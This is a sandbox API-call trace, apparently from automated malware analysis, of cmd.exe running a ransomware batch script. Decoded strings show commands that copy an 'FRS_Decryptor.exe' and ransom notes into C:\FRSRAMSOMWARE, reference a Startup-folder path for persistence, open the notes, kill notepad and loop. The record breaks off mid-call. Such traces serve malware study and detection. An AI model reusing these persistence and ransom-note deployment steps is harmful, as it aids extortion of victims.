[0099.377] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0099.377] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0099.377] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.377] GetFileType (hFile=0x2b8) returned 0x1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0099.377] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0099.377] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0099.377] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.377] GetFileType (hFile=0x2b8) returned 0x1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0099.377] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0099.377] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0099.377] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.377] GetFileType (hFile=0x2b8) returned 0x1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0099.377] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0099.377] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0099.377] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0099.377] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.377] GetFileType (hFile=0x2b8) returned 0x1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0099.378] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0099.378] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0099.378] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.378] GetFileType (hFile=0x2b8) returned 0x1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0099.378] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0099.378] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0099.378] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.378] GetFileType (hFile=0x2b8) returned 0x1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0099.378] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0099.378] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0099.378] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.378] GetFileType (hFile=0x2b8) returned 0x1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0099.378] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0099.378] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0099.378] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.378] GetFileType (hFile=0x2b8) returned 0x1 [0099.378] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0099.379] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0099.379] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0099.379] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.379] GetFileType (hFile=0x2b8) returned 0x1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0099.379] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0099.379] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0099.379] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.379] GetFileType (hFile=0x2b8) returned 0x1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0099.379] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0099.379] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0099.379] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.379] GetFileType (hFile=0x2b8) returned 0x1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0099.379] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0099.379] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0099.379] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.379] GetFileType (hFile=0x2b8) returned 0x1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0099.379] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0099.379] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0099.380] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0099.380] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.380] GetFileType (hFile=0x2b8) returned 0x1 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0099.380] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0099.380] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0099.380] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.380] GetFileType (hFile=0x2b8) returned 0x1 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0099.380] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0099.380] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0099.380] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0099.380] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0099.380] _get_osfhandle (_FileHandle=1) returned 0x28 [0099.380] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0099.381] _get_osfhandle (_FileHandle=0) returned 0x24 [0099.381] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0099.381] SetConsoleInputExeNameW () returned 0x1 [0099.381] GetConsoleOutputCP () returned 0x1b5 [0099.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0099.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.381] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0099.381] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0099.381] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.381] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0099.381] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0099.381] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0099.381] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0099.381] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0099.381] GetFileType (hFile=0x2b8) returned 0x1 [0099.382] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0099.382] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0099.382] _tell (_FileHandle=3) returned 2512 [0099.382] _close (_FileHandle=3) returned 0 [0099.382] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0099.382] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0099.382] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0099.382] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0099.382] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0099.382] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0099.382] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0099.382] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0099.382] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0099.382] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0099.382] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0099.382] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0099.382] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0099.382] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0099.382] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0099.382] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0099.382] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0099.382] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0099.382] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0099.382] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0099.382] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0099.382] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0099.382] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0099.382] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0099.382] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0099.382] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0099.382] _wcsicmp (_String1="ping", _String2="START") returned -3 [0099.382] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0099.382] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0099.382] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0099.382] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0099.382] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0099.382] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0099.382] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0099.382] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0099.382] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0099.382] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0099.382] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0099.383] SetErrorMode (uMode=0x0) returned 0x0 [0099.383] SetErrorMode (uMode=0x1) returned 0x0 [0099.383] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0099.383] SetErrorMode (uMode=0x0) returned 0x1 [0099.383] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.383] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.383] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0099.383] GetLastError () returned 0x2 [0099.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a130 [0099.383] FindClose (in: hFindFile=0xd5a130 | out: hFindFile=0xd5a130) returned 1 [0099.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0099.383] GetLastError () returned 0x2 [0099.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a130 [0099.383] FindClose (in: hFindFile=0xd5a130 | out: hFindFile=0xd5a130) returned 1 [0099.383] GetFileType (hFile=0x28) returned 0x2 [0099.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0099.384] _dup (_FileHandle=1) returned 3 [0099.384] _close (_FileHandle=1) returned 0 [0099.384] _wcsicmp (_String1="nul", _String2="con") returned 11 [0099.384] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0099.384] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0099.384] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0099.384] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0099.384] SetErrorMode (uMode=0x0) returned 0x0 [0099.384] SetErrorMode (uMode=0x1) returned 0x0 [0099.384] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0099.384] SetErrorMode (uMode=0x0) returned 0x1 [0099.384] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.384] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.384] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.384] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 